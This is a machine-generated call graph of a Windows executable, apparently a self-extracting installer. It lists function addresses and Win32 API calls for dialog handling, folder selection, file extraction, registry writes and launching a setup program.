12031->11933 12033 4115e5 FreeLibrary 12032->12033 12034 4115df 12032->12034 12033->12031 12034->12033 12060 409293 12035->12060 12037 4098ec 12077 4096af GetModuleHandleA FindResourceA 12037->12077 12039 4098f3 12039->11935 12041 406495 OleUninitialize 12040->12041 12042 40649b 12040->12042 12041->12042 12042->11942 12044 411610 12043->12044 12045 41160d FreeLibrary 12043->12045 12046 411617 FreeLibrary 12044->12046 12047 40d46a 12044->12047 12045->12044 12046->12047 12047->11948 12052 40b729 GetCurrentDirectoryA 12047->12052 12049 40b71f 12048->12049 12050 40b723 12049->12050 12051 40b706 PeekMessageA WaitForSingleObject 12049->12051 12050->11952 12051->12049 12053 40b7b8 12052->12053 12054 40b74d 12052->12054 12053->11948 12082 40a5bd CompareStringA 12054->12082 12056 40b767 12056->12053 12057 40b76b SetCurrentDirectoryA 12056->12057 12058 40b782 ctype 12057->12058 12059 40b797 SHFileOperationA 12058->12059 12059->12053 12061 4092a0 12060->12061 12062 4092b7 GetModuleFileNameA 12061->12062 12064 4092dc 12061->12064 12063 4092d3 12062->12063 12063->12064 12075 40930d ctype 12063->12075 12065 405097 4 API calls 12064->12065 12066 409309 12065->12066 12068 404fdc 31 API calls 12066->12068 12071 40568a 35 API calls 12066->12071 12074 4054ed 32 API calls 12066->12074 12066->12075 12076 4093f7 12066->12076 12067 4054ed 32 API calls 12069 40941c 12067->12069 12068->12066 12081 40a1ec GetProcessHeap RtlAllocateHeap 12069->12081 12071->12066 12072 40942a 12073 40568a 35 API calls 12072->12073 12072->12075 12073->12075 12074->12066 12075->12037 12076->12067 12076->12075 12078 4096dd 12077->12078 12080 4096d7 12077->12080 12079 409553 wvsprintfA 12078->12079 12079->12080 12080->12039 12081->12072 12082->12056 12102 40c59d 12103 40c5a7 12102->12103 12117 40bfe1 12102->12117 12133 40bd80 12103->12133 12105 40b613 ExpandEnvironmentStringsA 12105->12117 12106 40ca58 12107 40c021 lstrcmpiA 12107->12117 12108 40c068 GetCurrentDirectoryA 12108->12117 12109 40c2fe SetWindowTextA 12109->12117 12110 40b7ba 3 API calls 12110->12117 12111 40a224 4 API calls 12111->12117 12112 40c41e RegOpenKeyExA 12114 40c43a RegQueryValueExA RegCloseKey 12112->12114 12112->12117 12113 405bdd MultiByteToWideChar 12113->12117 12114->12117 12115 405fad 10 API calls 12115->12117 12116 40a205 ctype 2 API calls 12116->12117 12117->12105 12117->12106 12117->12107 12117->12108 12117->12109 12117->12110 12117->12111 12117->12112 12117->12113 12117->12115 12117->12116 12118 40b9b0 3 API calls 12117->12118 12121 405bca FindClose 12117->12121 12124 40c3ee SendMessageA 12117->12124 12131 40c0f0 ctype 12117->12131 12119 40c3af GetDlgItem SetWindowTextA SendMessageA 12118->12119 12119->12117 12120 40c0f5 SetFileAttributesA 12122 40c1bb GetFileAttributesA 12120->12122 12120->12131 12121->12117 12123 40c1c9 DeleteFileA 12122->12123 12122->12131 12123->12131 12124->12117 12125 405fad 10 API calls 12125->12131 12126 40c1e6 wsprintfA GetFileAttributesA 12128 40c208 MoveFileA 12126->12128 12126->12131 12127 407300 4 API calls 12127->12131 12128->12131 12129 406ea5 GetVersionExA 12129->12131 12130 40c229 MoveFileExA 12130->12131 12131->12117 12131->12120 12131->12122 12131->12125 12131->12126 12131->12127 12131->12129 12131->12130 12132 40c19a SHFileOperationA 12131->12132 12132->12122 12134 40bd92 ctype 12133->12134 12135 40be45 12134->12135 12143 40bf92 12134->12143 12158 40a59a CompareStringA 12134->12158 12137 405767 3 API calls 12135->12137 12138 40be59 12137->12138 12152 40be6f 12138->12152 12159 405822 GetFullPathNameA 12138->12159 12140 40beb7 ShellExecuteExA 12141 40bee9 12140->12141 12142 40becc ShellExecuteExA 12140->12142 12144 40bf36 CloseHandle 12141->12144 12145 40bf20 WaitForInputIdle 12141->12145 12146 40bf08 IsWindowVisible 12141->12146 12142->12141 12142->12143 12143->12117 12149 40bf44 12144->12149 12150 40bf51 12144->12150 12148 40b6ea 3 API calls 12145->12148 12146->12145 12147 40bf13 ShowWindow 12146->12147 12147->12145 12148->12144 12161 40a59a CompareStringA 12149->12161 12154 40bf7d Sleep 12150->12154 12155 40bf83 12150->12155 12152->12140 12153 405767 3 API calls 12152->12153 12156 40beaf 12153->12156 12154->12155 12155->12143 12157 40bf88 ShowWindow 12155->12157 12156->12140 12156->12143 12157->12143 12158->12135 12160 40584a 12159->12160 12160->12152 12161->12150 10084 40cc24 10085 40cc31 10084->10085 10203 40309d 10085->10203 10088 40cc5d 10090 40cc6f 10088->10090 10093 40cc67 10088->10093 10094 40ccce GetDlgItemTextA 10088->10094 10089 40d04f 10091 40d073 10089->10091 10092 40d064 SendMessageA 10089->10092 10095 40d08c 10091->10095 10096 40d07c SendDlgItemMessageA 10091->10096 10092->10091 10098 40cca7 10093->10098 10099 40cc6a 10093->10099 10097 40cd08 10094->10097 10094->10098 10278 40ba36 10095->10278 10096->10095 10102 40cd10 10097->10102 10103 40cd22 GetDlgItem 10097->10103 10098->10090 10106 40ccff EndDialog 10098->10106 10099->10090 10318 4098f7 10099->10318 10115 40d2a5 10102->10115 10116 40cffe 10102->10116 10108 40cd36 SendMessageA SendMessageA 10103->10108 10109 40cd57 SetFocus 10103->10109 10104 40d102 SetMenu 10110 40d159 GetCurrentDirectoryA GetDlgItem 10104->10110 10105 40d10b SetWindowPos DestroyWindow SendMessageA 10111 40d147 SendMessageA 10105->10111 10112 40d13c SendMessageA 10105->10112 10106->10090 10108->10109 10209 4058ff 10109->10209 10117 40d184 10110->10117 10118 40d18a SetWindowTextA 10110->10118 10111->10110 10112->10111 10131 40bf99 43 API calls 10115->10131 10121 4098f7 3 API calls 10116->10121 10117->10118 10296 40aafc 10118->10296 10127 40d00b SetDlgItemTextA 10121->10127 10124 40cd8b SetCurrentDirectoryA 10128 40cda3 GetLastError 10124->10128 10129 40cdaa 10124->10129 10125 40cd7b GetLastError 10126 40cd82 10125->10126 10126->10124 10133 40d01e 10127->10133 10128->10129 10216 406ea5 10129->10216 10136 40d2be 10131->10136 10132 40cc8f SetDlgItemTextA 10132->10090 10139 4098f7 3 API calls 10133->10139 10140 40d2d6 10136->10140 10141 40d2cc KiUserCallbackDispatcher 10136->10141 10142 40d03b 10139->10142 10145 40d2f0 10140->10145 10359 40307f GetDlgItem KiUserCallbackDispatcher 10140->10359 10141->10140 10148 4098f7 3 API calls 10142->10148 10143 40bf99 43 API calls 10173 40d1d1 10143->10173 10144 40d234 10144->10136 10156 40bf99 43 API calls 10144->10156 10147 40d31b 10145->10147 10158 40d315 PostMessageA 10145->10158 10159 40d30d SendMessageA 10145->10159 10147->10090 10161 4098f7 3 API calls 10147->10161 10154 40d042 MessageBoxA 10148->10154 10149 40ce31 10162 40cef0 10149->10162 10163 40ce4f GetModuleFileNameA wsprintfA ShellExecuteExA 10149->10163 10150 40cf4d 10228 40b92f 10150->10228 10151 40cdc4 GetTickCount wsprintfA 10155 40cdeb 10151->10155 10152 40d2e7 10360 40307f GetDlgItem KiUserCallbackDispatcher 10152->10360 10154->10090 10219 4051d8 10155->10219 10164 40d24d 10156->10164 10158->10147 10159->10147 10167 40d32a SetDlgItemTextA 10161->10167 10171 4098f7 3 API calls 10162->10171 10163->10162 10168 40cecd WaitForInputIdle Sleep 10163->10168 10170 40d27e 10164->10170 10178 40d25e 10164->10178 10165 4098f7 3 API calls 10165->10173 10167->10090 10176 40cf40 KiUserCallbackDispatcher 10168->10176 10170->10115 10174 40d289 DialogBoxParamA 10170->10174 10172 40cefa wsprintfA 10171->10172 10180 40cf22 10172->10180 10173->10144 10173->10165 10186 40d211 10173->10186 10174->10115 10175 40cf68 10235 40307f GetDlgItem KiUserCallbackDispatcher 10175->10235 10176->10090 10177 40ce02 ctype 10177->10149 10177->10150 10179 406d54 29 API calls 10178->10179 10182 40d273 10179->10182 10185 4098f7 3 API calls 10180->10185 10356 40a205 10182->10356 10183 40cf71 10236 40307f GetDlgItem KiUserCallbackDispatcher 10183->10236 10188 40cf2b MessageBoxA 10185->10188 10186->10144 10189 40d219 10186->10189 10188->10176 10330 406d54 10189->10330 10190 40cf79 10237 40bf99 10190->10237 10194 40bf99 43 API calls 10195 40cf95 10194->10195 10268 40b322 10195->10268 10198 40bf99 43 API calls 10201 40cfb2 10198->10201 10199 40cfd8 10329 40307f GetDlgItem KiUserCallbackDispatcher 10199->10329 10201->10199 10202 40bf99 43 API calls 10201->10202 10202->10199 10204 4030ca 10203->10204 10207 4030a6 10203->10207 10378 40952c 10204->10378 10206 4030c8 10206->10088 10206->10089 10207->10206 10361 40970e 10207->10361 10213 405910 10209->10213 10210 4059b4 10210->10124 10210->10125 10211 40598a 10211->10210 10390 405898 10211->10390 10213->10211 10215 405898 5 API calls 10213->10215 10398 40e115 WideCharToMultiByte 10213->10398 10215->10213 10217 406ee6 10216->10217 10218 406eb8 GetVersionExA 10216->10218 10217->10149 10217->10151 10217->10177 10218->10217 10220 4051e7 10219->10220 10221 406ea5 GetVersionExA 10220->10221 10222 4051fb 10221->10222 10223 405221 CreateFileA 10222->10223 10224 40520b CreateFileW 10222->10224 10225 405237 10223->10225 10224->10225 10226 40e115 WideCharToMultiByte 10225->10226 10227 405268 10225->10227 10226->10227 10227->10177 10229 40b943 10228->10229 10230 40b9ab 10228->10230 10229->10230 10231 40b95c RegCreateKeyExA 10229->10231 10234 40307f GetDlgItem KiUserCallbackDispatcher 10230->10234 10231->10230 10232 40b982 10231->10232 10233 40b98a RegSetValueExA RegCloseKey 10232->10233 10233->10230 10234->10175 10235->10183 10236->10190 10238 40bfa6 10237->10238 10239 40ca58 10238->10239 10406 40b613 10238->10406 10239->10194 10241 40c021 lstrcmpiA 10252 40bfd4 10241->10252 10242 40b613 ExpandEnvironmentStringsA 10242->10252 10243 40c068 GetCurrentDirectoryA 10243->10252 10244 40c2fe SetWindowTextA 10244->10252 10247 40c41e RegOpenKeyExA 10249 40c43a RegQueryValueExA RegCloseKey 10247->10249 10247->10252 10249->10252 10251 40a205 ctype 2 API calls 10251->10252 10252->10239 10252->10241 10252->10242 10252->10243 10252->10244 10252->10247 10252->10251 10259 40c3ee SendMessageA 10252->10259 10266 40c0f0 ctype 10252->10266 10410 40b9b0 10252->10410 10417 405bdd 10252->10417 10421 405fad 10252->10421 10430 405bca 10252->10430 10433 40b7ba 10252->10433 10439 40a224 10252->10439 10255 40c0f5 SetFileAttributesA 10257 40c1bb GetFileAttributesA 10255->10257 10255->10266 10258 40c1c9 DeleteFileA 10257->10258 10257->10266 10258->10266 10259->10252 10260 405fad 10 API calls 10260->10266 10261 40c1e6 wsprintfA GetFileAttributesA 10263 40c208 MoveFileA 10261->10263 10261->10266 10263->10266 10264 406ea5 GetVersionExA 10264->10266 10265 40c229 MoveFileExA 10265->10266 10266->10252 10266->10255 10266->10257 10266->10260 10266->10261 10266->10264 10266->10265 10267 40c19a SHFileOperationA 10266->10267 10425 407300 10266->10425 10267->10257 10269 40b32f 10268->10269 10456 40dd5a 10269->10456 10271 40b354 10459 403888 10271->10459 10275 40b3ca 10478 403981 10275->10478 10277 40b3d5 10277->10198 11776 40ad27 10278->11776 10281 40bb22 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 10281->10104 10281->10105 10282 40ba4c GetWindow 10282->10281 10285 40ba69 10282->10285 10283 40ba7e GetClassNameA 11781 40da54 CompareStringA 10283->11781 10285->10281 10285->10283 10286 40baa6 GetWindowLongA 10285->10286 10287 40bb07 GetWindow 10285->10287 10286->10287 10288 40bab6 SendMessageA 10286->10288 10287->10281 10287->10285 10288->10287 10289 40bac8 GetObjectA 10288->10289 11782 40ace4 10289->11782 10291 40badd 11786 40aca1 10291->11786 11790 40abdc GetDC CreateCompatibleDC CreateCompatibleDC GetObjectA 10291->11790 10294 40baed SendMessageA 10294->10287 10295 40bb00 DeleteObject 10294->10295 10295->10287 10297 406ea5 GetVersionExA 10296->10297 10298 40ab07 10297->10298 10299 40ab56 GetClassNameA 10298->10299 10300 40ab22 GetModuleHandleA 10298->10300 10302 40ab8e 10298->10302 10301 40ab6b lstrcmpiA 10299->10301 10299->10302 10303 40ab31 GetProcAddress 10300->10303 10304 40ab42 10300->10304 10301->10302 10305 40ab80 FindWindowExA 10301->10305 10306 40ca95 10302->10306 10303->10304 10304->10299 10304->10302 10305->10302 10307 40caa2 10306->10307 11793 401884 10307->11793 10312 40cb1c 10315 401b38 ctype 2 API calls 10312->10315 10313 40a668 2 API calls 10317 40caf6 10313->10317 10314 40a205 ctype 2 API calls 10314->10312 10316 40cb27 10315->10316 10316->10143 10316->10173 10317->10312 10317->10314 10319 409907 10318->10319 10320 40993a LoadStringA 10319->10320 10321 40994c LoadStringA 10319->10321 10320->10321 10322 40995a 10320->10322 10321->10322 10323 409553 wvsprintfA 10322->10323 10324 409967 10323->10324 10325 4027d8 SHGetMalloc 10324->10325 10326 4027f3 SHBrowseForFolderA 10325->10326 10328 4027ef 10325->10328 10327 402830 SHGetPathFromIDListA 10326->10327 10326->10328 10327->10328 10328->10090 10328->10132 10329->10102 10331 406d65 OleInitialize #17 10330->10331 10332 406d77 ShowWindow 10330->10332 10331->10332 11886 406ced LoadCursorA RegisterClassExA 10332->11886 10334 406d92 GetWindowRect GetParent MapWindowPoints 10335 406dc6 DestroyWindow 10334->10335 10336 406dcd GetParent CreateWindowExA 10334->10336 10335->10336 10337 406e18 10336->10337 10338 406e0a ShowWindow UpdateWindow 10336->10338 10339 406e2d 10337->10339 10340 406e1e 10337->10340 10338->10337 10342 406e34 DestroyWindow 10339->10342 10343 406e3e ShowWindow 10339->10343 10341 406e2b 10340->10341 11887 4066b3 GetTickCount GetTickCount 10340->11887 10341->10144 10342->10343 10345 406e4d 10343->10345 11894 40a1ec GetProcessHeap RtlAllocateHeap 10345->11894 10347 406e5b 10348 406e7a 10347->10348 11895 4065e9 10347->11895 11901 406a19 10348->11901 10352 40a205 ctype 2 API calls 10353 406e8a 10352->10353 10353->10341 10354 406e8e SetWindowTextA 10353->10354 10355 40a205 ctype 2 API calls 10354->10355 10355->10341 10357 40a220 10356->10357 10358 40a20e GetProcessHeap RtlFreeHeap 10356->10358 10357->10170 10358->10357 10359->10152 10360->10145 10381 409637 10361->10381 10363 40972d GetWindowRect GetClientRect 10364 409768 10363->10364 10365 40979b 10363->10365 10366 4097db GetSystemMetrics GetWindow 10364->10366 10367 40976e SetWindowPos 10364->10367 10365->10366 10368 4097a1 GetWindowTextA 10365->10368 10377 4097ff 10366->10377 10367->10365 10384 409553 10368->10384 10370 4097cb SetWindowTextA 10370->10366 10371 4098d9 10371->10206 10372 40980c GetWindowTextA 10372->10377 10373 409553 wvsprintfA 10376 40983f SetWindowTextA 10373->10376 10374 409855 GetWindowRect SetWindowPos 10375 4098bb GetWindow 10374->10375 10375->10371 10375->10377 10376->10377 10377->10371 10377->10372 10377->10373 10377->10374 10377->10375 10379 409550 10378->10379 10380 409532 GetWindowLongA SetWindowLongA 10378->10380 10379->10206 10380->10379 10382 409553 wvsprintfA 10381->10382 10383 409659 10382->10383 10383->10363 10385 40956a 10384->10385 10387 4095d5 10384->10387 10388 40a610 wvsprintfA 10385->10388 10387->10370 10389 40a635 10388->10389 10389->10387 10391 406ea5 GetVersionExA 10390->10391 10392 4058a1 10391->10392 10393 4058bd CreateDirectoryA 10392->10393 10395 4058b2 CreateDirectoryW 10392->10395 10394 4058c8 10393->10394 10397 4058de 10394->10397 10400 4057e8 10394->10400 10395->10394 10397->10210 10399 40e139 10398->10399 10399->10213 10401 406ea5 GetVersionExA 10400->10401 10402 4057ed 10401->10402 10403 40580c SetFileAttributesA 10402->10403 10405 4057ff SetFileAttributesW 10402->10405 10404 40581a 10403->10404 10404->10397 10405->10404 10407 40b620 10406->10407 10408 40b6ae ExpandEnvironmentStringsA 10407->10408 10409 40b6d4 10407->10409 10408->10409 10409->10252 10411 40ba32 GetDlgItem SetWindowTextA SendMessageA 10410->10411 10412 40b9c2 10410->10412 10411->10252 10413 40b9d1 RegOpenKeyExA 10412->10413 10413->10411 10414 40b9ee RegQueryValueExA 10413->10414 10415 40ba29 RegCloseKey 10414->10415 10416 40ba1a 10414->10416 10415->10411 10416->10415 10418 405bea 10417->10418 10419 405c05 10418->10419 10444 40e144 MultiByteToWideChar 10418->10444 10419->10252 10422 405fbb 10421->10422 10423 405c10 10 API calls 10422->10423 10424 406038 10422->10424 10423->10422 10424->10252 10446 4072db 10425->10446 10428 40a610 wvsprintfA 10429 407326 10428->10429 10429->10266 10431 405bd5 FindClose 10430->10431 10432 405bdc 10430->10432 10431->10432 10432->10252 10434 40b7c7 10433->10434 10454 40a1ec GetProcessHeap RtlAllocateHeap 10434->10454 10436 40b613 ExpandEnvironmentStringsA 10438 40b7d3 10436->10438 10437 40b871 10437->10252 10438->10436 10438->10437 10440 40a237 GetProcessHeap HeapReAlloc 10439->10440 10441 40a22d 10439->10441 10443 40a235 10440->10443 10455 40a1ec GetProcessHeap RtlAllocateHeap 10441->10455 10443->10252 10445 40e163 10444->10445 10445->10419 10449 40da9a 10446->10449 10450 4072e9 10449->10450 10451 40daa5 10449->10451 10450->10428 10450->10429 10453 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 10451->10453 10453->10450 10454->10438 10455->10443 10484 40dc32 10456->10484 10458 40dd65 10458->10271 10460 403891 10459->10460 10599 40a668 10460->10599 10464 4038c0 10602 410b78 10464->10602 10467 404950 10468 40495d 10467->10468 10473 4049e5 10468->10473 10653 406045 10468->10653 10470 404a72 10472 4098f7 3 API calls 10470->10472 10476 404a9f 10470->10476 10474 404a96 10472->10474 10473->10470 10477 406045 11 API calls 10473->10477 10659 4047ab 10473->10659 10475 40b2a9 15 API calls 10474->10475 10475->10476 10476->10275 10477->10473 10479 40398f 10478->10479 10481 40399c ctype 10478->10481 10480 41020a 2 API calls 10479->10480 10482 403996 10480->10482 10481->10277 10483 40a65b ctype 2 API calls 10482->10483 10483->10481 10485 40dc48 10484->10485 10492 401313 10485->10492 10487 40dc51 10491 40dc9a 10487->10491 10498 40eb33 10487->10498 10489 40dc7b 10504 4012b7 10489->10504 10491->10458 10493 40134f 10492->10493 10494 401327 10492->10494 10493->10487 10495 40a224 4 API calls 10494->10495 10496 40133f 10495->10496 10496->10493 10510 403443 10496->10510 10499 40eb47 10498->10499 10500 40eb74 10498->10500 10501 40a224 4 API calls 10499->10501 10500->10489 10502 40eb64 10501->10502 10502->10500 10503 403443 30 API calls 10502->10503 10503->10500 10505 4012f6 10504->10505 10506 4012cb 10504->10506 10505->10491 10507 40a224 4 API calls 10506->10507 10508 4012e6 10507->10508 10508->10505 10509 403443 30 API calls 10508->10509 10509->10505 10515 40339f 10510->10515 10516 4098f7 3 API calls 10515->10516 10517 4033a6 10516->10517 10528 40ae5a 10517->10528 10520 40328f 10521 40329c 10520->10521 10522 4032bd 10521->10522 10545 405472 10521->10545 10522->10493 10529 40ae6a 10528->10529 10530 4033ac 10528->10530 10529->10530 10531 40ae6f wvsprintfA 10529->10531 10530->10520 10533 40ad46 GetDlgItem 10531->10533 10534 40ad76 10533->10534 10535 40ada8 SendMessageA SendMessageA 10533->10535 10542 40649c 10534->10542 10537 40adf8 SendMessageA SendMessageA SendMessageA 10535->10537 10538 40addc 10535->10538 10540 40ae42 SendMessageA 10537->10540 10541 40ae24 SendMessageA 10537->10541 10538->10537 10540->10530 10541->10540 10543 4064b1 ShowWindow SendMessageA SendMessageA 10542->10543 10544 4064a6 DestroyWindow 10542->10544 10543->10535 10544->10543 10546 405483 10545->10546 10547 4032b2 10546->10547 10562 404fac 10546->10562 10569 404f2e 10546->10569 10550 40b877 10547->10550 10551 40b8a1 10550->10551 10552 40b88c 10550->10552 10554 4032b7 10551->10554 10555 40b8b6 ShowWindow 10551->10555 10553 4098f7 3 API calls 10552->10553 10556 40b893 SetDlgItemTextA 10553->10556 10561 40a600 ExitProcess 10554->10561 10557 40b8c6 10555->10557 10558 40b8e3 10555->10558 10556->10551 10557->10558 10559 40b8ce SendMessageA 10557->10559 10558->10554 10596 40a82d PeekMessageA 10558->10596 10559->10558 10563 404fb5 10562->10563 10564 404fb9 10562->10564 10563->10546 10565 404fc4 10564->10565 10566 404f2e 30 API calls 10564->10566 10565->10563 10575 405866 10565->10575 10566->10565 10570 404f40 10569->10570 10571 404f3a 10569->10571 10570->10571 10572 404f60 10570->10572 10573 404f4e FindCloseChangeNotification 10570->10573 10571->10546 10572->10571 10581 4032d5 10572->10581 10573->10572 10576 406ea5 GetVersionExA 10575->10576 10577 40586b 10576->10577 10578 405886 DeleteFileA 10577->10578 10580 40587d DeleteFileW 10577->10580 10579 404fda 10578->10579 10579->10546 10580->10579 10582 4032e1 10581->10582 10588 4032f4 10581->10588 10583 4098f7 3 API calls 10582->10583 10585 4032ec 10583->10585 10584 40328f 30 API calls 10586 403300 10584->10586 10589 40b2a9 10585->10589 10586->10571 10588->10584 10591 40b2b6 10589->10591 10590 40b302 10590->10588 10591->10590 10592 40b2ce wvsprintfA 10591->10592 10593 40ae5a 13 API calls 10592->10593 10594 40b2f5 10593->10594 10594->10590 10595 40b2fb SetLastError 10594->10595 10595->10590 10597 40a848 KiUserCallbackDispatcher TranslateMessage DispatchMessageA 10596->10597 10598 40a869 10596->10598 10597->10598 10598->10558 10615 40a1ec GetProcessHeap RtlAllocateHeap 10599->10615 10601 4038b3 10601->10464 10610 40fe4c 10601->10610 10603 410b83 10602->10603 10609 410ba2 10602->10609 10604 40a668 2 API calls 10603->10604 10605 410b8d 10604->10605 10608 403443 30 API calls 10605->10608 10605->10609 10608->10609 10616 410a90 10609->10616 10647 40609f 10610->10647 10612 40fe54 10650 407ad8 10612->10650 10615->10601 10617 4038d3 10616->10617 10618 410aa0 ctype 10616->10618 10617->10467 10620 41018e 10618->10620 10629 40dbcb 10620->10629 10623 4101cb 10624 40dbcb 2 API calls 10623->10624 10626 4101d6 10624->10626 10627 4101fd 10626->10627 10628 40fee6 2 API calls 10626->10628 10628->10626 10630 40dbd4 10629->10630 10631 40dbda 10629->10631 10632 40a205 ctype 2 API calls 10630->10632 10631->10623 10633 40fee6 10631->10633 10632->10631 10638 40fad6 10633->10638 10643 4012aa 10638->10643 10641 4012aa ctype 2 API calls 10642 40fae9 10641->10642 10644 4012b0 10643->10644 10645 4012b6 10643->10645 10646 40a205 ctype 2 API calls 10644->10646 10645->10641 10646->10645 10648 40a668 2 API calls 10647->10648 10649 4060ac 10648->10649 10649->10612 10651 40609f 2 API calls 10650->10651 10652 407ae0 10651->10652 10652->10464 10654 40605e 10653->10654 10656 406062 10654->10656 10678 405c10 10654->10678 10656->10468 10657 406074 10657->10656 10658 406079 FindClose 10657->10658 10658->10656 10660 4047b8 10659->10660 10717 4051ac 10660->10717 10664 404805 10666 404820 10664->10666 10667 404809 10664->10667 10665 4047e7 10958 401b38 10665->10958 10666->10665 10676 406045 11 API calls 10666->10676 10677 4048d3 10666->10677 10950 4077c1 10666->10950 10946 4076a4 10667->10946 10674 4048f0 10674->10665 10763 401ce5 10674->10763 10825 403a34 10674->10825 10676->10666 10758 4038d8 10677->10758 10679 406ea5 GetVersionExA 10678->10679 10680 405c23 10679->10680 10681 405c30 10680->10681 10682 405dec 10680->10682 10685 40e144 MultiByteToWideChar 10681->10685 10687 405c3d 10681->10687 10683 405e07 10682->10683 10686 405df8 10682->10686 10684 40e115 WideCharToMultiByte 10683->10684 10684->10686 10685->10687 10688 405e29 FindFirstFileA 10686->10688 10689 405e5f FindNextFileA 10686->10689 10690 405ca2 FindNextFileW 10687->10690 10691 405c6e FindFirstFileW 10687->10691 10693 405e3d 10688->10693 10695 405e8a 10688->10695 10694 405e6c 10689->10694 10692 405caf 10690->10692 10696 405ccd 10691->10696 10713 405c82 10691->10713 10692->10696 10692->10713 10693->10713 10694->10695 10694->10713 10697 40e144 MultiByteToWideChar 10695->10697 10698 40e115 WideCharToMultiByte 10696->10698 10700 405eb8 10697->10700 10699 405cfb 10698->10699 10701 40e115 WideCharToMultiByte 10699->10701 10704 40df79 3 API calls 10700->10704 10702 405d41 10701->10702 10714 40df79 FileTimeToLocalFileTime FileTimeToSystemTime 10702->10714 10705 405f59 10704->10705 10707 40df79 3 API calls 10705->10707 10706 405d9d 10708 40df79 3 API calls 10706->10708 10709 405f6b 10707->10709 10710 405daf 10708->10710 10711 40df79 3 API calls 10709->10711 10712 40df79 3 API calls 10710->10712 10711->10713 10712->10713 10713->10657 10716 40dfd9 10714->10716 10715 40dfff SystemTimeToFileTime 10715->10706 10716->10715 10963 405097 10717->10963 10719 4047e3 10719->10665 10722 401357 10719->10722 10720 4051bd 10720->10719 10972 40348e 10720->10972 10981 40568a 10722->10981 10724 401376 10725 4013b0 10724->10725 10726 401397 10724->10726 10748 40137b 10724->10748 10992 403952 10725->10992 10727 4013ab 10726->10727 11007 4054ed 10726->11007 10731 401ce5 47 API calls 10727->10731 10733 401499 10731->10733 11001 401264 10733->11001 10734 4013c4 10736 40568a 35 API calls 10734->10736 10738 4013d7 10736->10738 10739 401437 10738->10739 10750 4054ed 32 API calls 10738->10750 10741 401485 10739->10741 10742 40146f 10739->10742 10740 4098f7 3 API calls 10743 4014b7 10740->10743 10741->10727 10747 40a205 ctype 2 API calls 10741->10747 10746 40a205 ctype 2 API calls 10742->10746 10742->10748 10744 40b2a9 15 API calls 10743->10744 10745 4014c1 10744->10745 10745->10748 11004 40a7e9 10745->11004 10746->10748 10747->10727 10748->10664 10752 40144c 10750->10752 10751 401ce5 47 API calls 10756 401582 10751->10756 10752->10739 10753 40568a 35 API calls 10752->10753 10753->10739 10754 401609 11012 40a810 10754->11012 10756->10751 10756->10754 10757 401264 32 API calls 10756->10757 10757->10756 10759 40554a 32 API calls 10758->10759 10760 4038e6 10759->10760 11066 40e0e1 GetSystemTime SystemTimeToFileTime 10760->11066 10764 401cf2 10763->10764 10765 404fdc 31 API calls 10764->10765 10767 401cfc 10765->10767 10766 401d72 11069 408d14 10766->11069 10767->10766 10770 40568a 35 API calls 10767->10770 10769 401ded 10772 401d56 10769->10772 10780 401df7 10769->10780 10771 401d51 10770->10771 10771->10772 10774 401da4 10771->10774 11086 402c96 10771->11086 11079 401b80 10772->11079 11092 402dbd 10774->11092 10777 401d6b 10777->10674 10778 401d99 10778->10774 10781 404f2e 30 API calls 10778->10781 10779 40a205 ctype 2 API calls 10779->10777 10782 401e43 10780->10782 10783 401e74 10780->10783 10781->10774 10784 4098f7 3 API calls 10782->10784 10787 408d14 39 API calls 10783->10787 10785 401e4f 10784->10785 10786 40b2a9 15 API calls 10785->10786 10802 401d5d 10786->10802 10813 401e9c 10787->10813 10788 4024c1 10789 4024fa 10788->10789 10790 4024df 10788->10790 10789->10777 10795 40a205 ctype 2 API calls 10789->10795 10792 4098f7 3 API calls 10790->10792 10791 40248a 10793 4098f7 3 API calls 10791->10793 10796 4024eb 10792->10796 10797 402495 10793->10797 10794 401ed1 10794->10788 10794->10791 10798 40a7e9 31 API calls 10794->10798 10795->10777 10799 40b2a9 15 API calls 10796->10799 10800 40b2a9 15 API calls 10797->10800 10801 40244e 10798->10801 10799->10802 10803 40249c 10800->10803 10804 404fdc 31 API calls 10801->10804 10802->10777 10802->10779 10805 404f2e 30 API calls 10803->10805 10806 402455 10804->10806 10805->10802 10807 4054ed 32 API calls 10806->10807 10809 402466 10807->10809 10810 40247c 10809->10810 11101 40574f 10809->11101 10811 40a810 32 API calls 10810->10811 10812 402484 10811->10812 10812->10788 10812->10791 10813->10794 10814 4020c0 10813->10814 10816 402147 10813->10816 10820 4020f1 10814->10820 11096 401708 10814->11096 10817 40e115 WideCharToMultiByte 10816->10817 10816->10820 10818 4021a3 CharToOemA 10817->10818 10818->10820 10820->10794 11100 40dba8 OemToCharA 10820->11100 10821 40238a 10822 4098f7 3 API calls 10821->10822 10823 402392 10822->10823 10824 40b2a9 15 API calls 10823->10824 10824->10794 10827 403a41 10825->10827 10826 403a77 10828 403b56 10826->10828 10837 403a7b ctype 10826->10837 10838 403aa5 10826->10838 10827->10826 10827->10837 11162 41126f 10827->11162 10830 403b91 OemToCharA 10828->10830 10828->10837 10831 403bb1 10830->10831 11104 402aee 10831->11104 10832 403afe 10833 403b06 10832->10833 10834 403b48 ctype 10832->10834 10833->10837 10839 41126f 53 API calls 10833->10839 10836 401264 32 API calls 10834->10836 10834->10837 10836->10837 10837->10674 10838->10832 10838->10834 11201 40382e 10838->11201 10840 403b22 10839->10840 10840->10837 10842 4054ed 32 API calls 10840->10842 10842->10837 10843 403bd1 10844 40e115 WideCharToMultiByte 10843->10844 10845 403c4d 10843->10845 10844->10845 10845->10837 10846 4054ed 32 API calls 10845->10846 10847 403d46 10846->10847 10847->10834 11110 40bb56 10847->11110 10850 402c96 2 API calls 10851 403dc2 10850->10851 10852 403dc6 10851->10852 10854 403df0 10851->10854 10853 40ae5a 13 API calls 10852->10853 10855 403dcd 10853->10855 10859 40da9a 3 API calls 10854->10859 10856 4098f7 3 API calls 10855->10856 10857 403ddc 10856->10857 10858 40ae5a 13 API calls 10857->10858 10858->10837 10860 403e68 10859->10860 10861 40e144 MultiByteToWideChar 10860->10861 10862 403eb1 10860->10862 10861->10862 10863 406045 11 API calls 10862->10863 10864 403fd0 10862->10864 10865 403fa1 10863->10865 10866 4098f7 3 API calls 10864->10866 10872 404032 10864->10872 10865->10864 11207 40e0b7 10865->11207 10868 404028 10866->10868 10870 40b2a9 15 API calls 10868->10870 10869 403fb7 10869->10864 11210 40e057 10869->11210 10870->10872 10871 40435c 10874 40bb56 20 API calls 10871->10874 10877 404345 10871->10877 10872->10871 10880 40422d 10872->10880 10884 404072 10872->10884 10873 4043f1 11141 409013 10873->11141 10874->10877 10877->10834 10877->10873 10878 405051 